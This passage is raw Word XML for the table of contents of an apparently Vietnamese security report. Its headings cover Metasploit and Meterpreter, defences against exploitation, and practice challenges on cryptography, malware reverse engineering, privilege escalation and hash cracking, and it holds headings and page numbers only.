              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F16A7CE" w14:textId="091CEE2E" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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64" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.5.1.3.7. Mã hóa kém</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64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3</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23308864" w14:textId="2EDCD5AC" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">
          <w:pPr>
            <w:pStyle w:val="TOC5"/>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65" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.5.1.3.8. Zero-day</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65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4</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17ED363A" w14:textId="61317A3A"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66" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Calibri" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.5.2. Khai thác lỗ hổng với Metasploit</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66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4</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="02461701" w14:textId="2074102A"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67" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.5.2.1. Giới thiệu Metasploit</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67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4</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55ED4339" w14:textId="0419901A"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68" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.5.2.2. Các thành phần của Metasploit</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68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4</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A38D4F4" w14:textId="64010A6D"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69" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.5.2.3. Cách sử dụng Metasploit framework</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69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5</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="414E46B1" w14:textId="450F78C9"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70" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.5.2.4. Giới thiệu payload meterpreter</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70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6</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="72FADB06" w14:textId="50FC84AE"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71" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.5.2.5. Cách phòng chống khai thác lỗ hổng bằng metasploit</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71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7</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1CB17682" w14:textId="55F14C30" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="vi-VN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc90050772" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>CHƯƠNG 3: THỰC HÀNH</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72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8</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F1C207B" w14:textId="0D110EB5" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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73" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.1. Thử thách encryptioncrypto101</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73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8</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="551704EB" w14:textId="6CB58192"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74" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.1.1. Các thuật ngữ cơ bản</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74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8</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F249D56" w14:textId="18FB4DA6"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75" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.1.2. Tầm quan trọng của mã hoá</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75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8</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6AB4D0A5" w14:textId="72076D18"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76" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.1.3. Phép toán cốt yếu trong mã hoá</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76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9</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35B53311" w14:textId="3602718E"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77" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.1.4.  Các loại mã hoá</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77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29</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0374E6F3" w14:textId="2FC300BB"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78" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.1.5. Mã hoá và SSH Authentication</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78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30</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36CCAE9A" w14:textId="2D947A6B"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79" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.1.6.  PGP, GPG và AES</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79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30</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="655317DE" w14:textId="33C70E2E"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80" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.1.7. Tương lai của máy tính lượng tử và mã hoá</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80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31</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FC79C41" w14:textId="153DFE99"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81" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.1.8. Các task</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81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31</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67C24613" w14:textId="26FA91FF" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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82" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.2. Basic Malware RE</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82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34</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2307264A" w14:textId="7F0F8A9D"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83" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.2.1. Yêu cầu</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83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34</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6454A120" w14:textId="294F2977"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84" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.2.2. Công cụ</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84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34</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1DB623F7" w14:textId="547632FF"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85" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.2.3. Các bước thực hiện</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85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34</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F8E7E50" w14:textId="61B6910A" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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86" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.3. Thử thách Wonderland (Leo thang đặc quyền)</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86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41</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4890BD1F" w14:textId="612E840B"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87" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.3.1. Công cụ sử dụng</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87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41</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73B4240D" w14:textId="1EA7EFED" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>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88" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.3.2. Các bước thực hiện</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88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41</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60D80619" w14:textId="56A87DF7" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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89" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.4. Crack the hash</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89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51</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A6EE531" w14:textId="46039463"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90" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.4.1. Yêu cầu</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90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51</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B5B6928" w14:textId="5CF69461"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91" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.4.2. Công cụ</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91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51</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2CDE1400" w14:textId="0EDD300B"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92" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.4.3. Các bước thực hiện:</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92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51</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5EB21033" w14:textId="3E24C246" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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93" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.5. Bolt walkthrough</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93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67</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70246A50" w14:textId="45D68157"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94" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.5.1. Yêu cầu</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94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67</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="400F6D95" w14:textId="7FAF7E9C"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95" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.5.2. Công cụ</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95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68</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2AEBC3F9" w14:textId="16394AEC"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96" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.5.3. Các bước thực hiện</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96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68</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31C9EEF1" w14:textId="395D0A71" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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97" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.6. Overpass 2</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97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79</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2AE051F8" w14:textId="0051E7E8"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98" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
